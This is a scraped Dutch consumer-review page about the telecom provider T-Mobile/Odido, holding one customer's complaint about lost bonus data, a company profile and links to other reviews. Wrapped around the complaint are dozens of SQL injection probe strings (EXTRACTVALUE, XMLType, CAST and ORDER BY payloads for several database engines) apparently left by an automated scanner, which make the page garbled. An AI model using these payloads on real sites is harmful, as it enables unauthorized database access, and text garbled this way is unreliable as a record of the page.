  QMKp AND 7991=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7991=7991) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)-- xLHb

  QMKp') ORDER BY 1-- XkMI

  QMKp' ORDER BY 1-- rtix

  QMKp) ORDER BY 1-- Kxgu

  QMKp ORDER BY 1-- kplv

  QMKp ORDER BY 1-- yBVq

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Telefoon abbo Samsung galaxy s21 ultra

  Wij zijn al reeds meerdere jaren klant van T-Mobile en hebben al meerdere abonnementen gehad. Dit is tot op heden zonder problemen verlopen.

  Echter blijkt er sinds deze maand, juni 2022, de 2gb data, die we normaal als bonus hebben ivm andere producten, te zijn verdwenen.
  Na contact met de klantenservice zou het komen door een andere aansluiting op het betreffende adres, maar kan ze dit niet controleren ivm scheiding zakelijk en particuliere klantenservice.

  Hoe kan het dat:
  - Particuliere klanten aan de voordelen van een zakelijke klant kunnen komen
  - Wij hier door T-Mobile niet over geinformeerd zijn
  - T-mobile aangeeft hier niks aan te kunnen en willen doen.

  Wij hebben besloten na het aflopen van de huidige abonnementen niet langer klant van T-Mobile te blijven.

  Hoe zou ik T-Mobile beoordelen op een schaal van 1-10: 3

  FCPg') AND EXTRACTVALUE(6236,CONCAT(0x5c,0x71627a6271,(SELECT (ELT(6236=6236,1))),0x7170716a71)) AND ('VrCR'='VrCR

  FCPg' AND EXTRACTVALUE(6236,CONCAT(0x5c,0x71627a6271,(SELECT (ELT(6236=6236,1))),0x7170716a71)) AND 'qmDC'='qmDC

  FCPg) AND EXTRACTVALUE(6236,CONCAT(0x5c,0x71627a6271,(SELECT (ELT(6236=6236,1))),0x7170716a71)) AND (3269=3269

  FCPg AND EXTRACTVALUE(6236,CONCAT(0x5c,0x71627a6271,(SELECT (ELT(6236=6236,1))),0x7170716a71))

  FCPg AND EXTRACTVALUE(6236,CONCAT(0x5c,0x71627a6271,(SELECT (ELT(6236=6236,1))),0x7170716a71))-- BHIC

  FCPg') AND 7099=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7099=7099) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND ('JDYu'='JDYu

  FCPg' AND 7099=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7099=7099) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND 'KsrP'='KsrP

  FCPg) AND 7099=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7099=7099) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC) AND (5439=5439

  FCPg AND 7099=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7099=7099) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC)

  FCPg AND 7099=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7099=7099) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC)-- jYPZ

  FCPg') AND 7672 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7672=7672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))) AND ('YhdN'='YhdN

  FCPg' AND 7672 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7672=7672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'DfQA'='DfQA

  FCPg) AND 7672 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7672=7672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))) AND (7640=7640

  FCPg AND 7672 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7672=7672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)))

  FCPg AND 7672 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7672=7672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)))-- wfZj

  FCPg') AND 8521=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8521=8521) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('ttKp'='ttKp

  FCPg' AND 8521=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8521=8521) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'agsC'='agsC

  FCPg) AND 8521=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8521=8521) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (3408=3408

  FCPg AND 8521=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8521=8521) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)

  FCPg AND 8521=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8521=8521) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- vTPh

  FCPg') ORDER BY 1-- QouD

  FCPg' ORDER BY 1-- jSKl

  FCPg) ORDER BY 1-- bTsV

  FCPg ORDER BY 1-- KNsm

  FCPg ORDER BY 1-- azNF

Anderen bekeken ook

Mobiel.nl
371 reviews

Lees op NederlandReview wat anderen van Mobiel.nl vinden, bekijk hun site en ontdek ook de goede aanbiedingen.   Waarom zou je moeten kieze...

Ben
58 reviews

‘Terreur!’ Zo noemde Youp van ’t Hek het beleid van T-Mobile, als voorbeeld van hoe eigenlijk alle telecombedrijven tegenwoordig ...

Trans IP
17 reviews

Wat vinden de klanten die aan je voorafgingen van TransIP? Hierover valt meer te lezen in de reviews van andere Nederlanders die eerder al gebruik ...

Mejane.com
15 reviews

Wat anderen zeggen over Mejane.com. Mejane.com is een video on demand site. Je kunt het zien als een videotheek (tegenwoordig natuurlijk met dvd&rs...

Odido (voorheen t-mobile)

Wat vinden anderen van Odido? Natuurlijk zijn er volop mensen welke bekend zijn met Odido Het is niet alleen in Nederland, maar eigenlijk wereldwijd een zeer grote speler op de markt van mobiele telefonie abonnementen en smartphones. Waarschijnlijk heb jij of een van je vrienden of familieleden ook een abonnement bij Odido.

Ben (de goedkoper aanbieder van sim-only-abonnementen) is trouwens ook een onderdeel van Odido. Er zijn volop verschillende mogelijkheden om een goede deal te krijgen op de website. Een mooie smartphone of tablet in combinatie met een abonnement op maat is natuurlijk iets wat je gewoon nodig hebt vandaag de dag. Bij Odido kun je natuurlijk een abonnement kiezen wat bij je past met het juiste aantal belminuten, tekstberichten en dataverkeer.

Heb jij een goede of slechte ervaring meet Odido? Dan is het goed om je beoordeling over Odido met ons te delen op NederlandReview.

Over Odido
Odido is een bedrijf welke mobiele communicatie aanbiedt voor zakelijke gebruikers en ook voor consumenten. Odido heeft bijna 4 miljoen klanten in Nederland en is een onderdeel van Deutsche Telecom. Dit is een van de grootste aanbieders van mobiele communicatie in de wereld. Ze zijn toonaangevend op de markt van mobiel internet. Enkele kerngegevens van Odido:

Het hoofdkantoor zit in Den-Haag Het call en service center in Arnhem Er zijn 113 winkels in Nederland Ze hebben 2 Samsung partnerstores Odido  heeft 3,9 miljoen klanten Er werken 1500 FTE De omzet was in 2014: € 1,5 miljard De EBITDA was in 2014: € 630 miljoen

 

De diensten van Odido
Odido zorgt ervoor dat mensen elkaar kunnen bellen op de smartphone of meet een andere manier van mobiele communicatie. Odido biedt hiervoor tal van verschillende abonnementen aan waarbij je zelf je internetbundel en belbundel kunt bepalen. Het abonnement is af te sluiten in combinatie met een smartphone.
Het is goed om te weten dat alle belminuten in heel Europa gebruikt kunnen worden.  Enkele abonnementen van Odido zijn:

- Stel samen
- Sim Only
- PrePaid
- Internet

Klachten of tips over Odido
Natuurlijk kan het voorkomen dat er eens iets misgaat. Het is dan natuurlijk belangrijk om goed geholpen te worden. Mocht dit niet zo zijn, dan kun je het beste een lacht indienen. Odido heeft een uitgebreide klantenservice. Ze zorgen er continu voor om deze klantenservice nog beter te maken.
Een klacht kun je indienen via de website, door een mail te sturen of een brief per post. Natuurlijk kun je ook bellen. 

Wat vind jij van Odido?
Ben jij ook een klant of een klant geweest van Odido? Laat dan op onze website je mening achter over het bedrijf. Op die manier kunnen we een goed beeld krijgen van hoe Odido te werk gaat. Anderen kunnen ook kijken of een abonnement afsluiten bij Odido slim is. Hoe nauwkeuriger je bent in het geven van je beoordeling, hoe meer anderen hier baat bij kunnen hebben. 

Makkelijk opwaarderen? Goed bereik (en goedkoop) in het buitenland? Lees ervaringen van consumenten over Odido bij NederlandReview!

}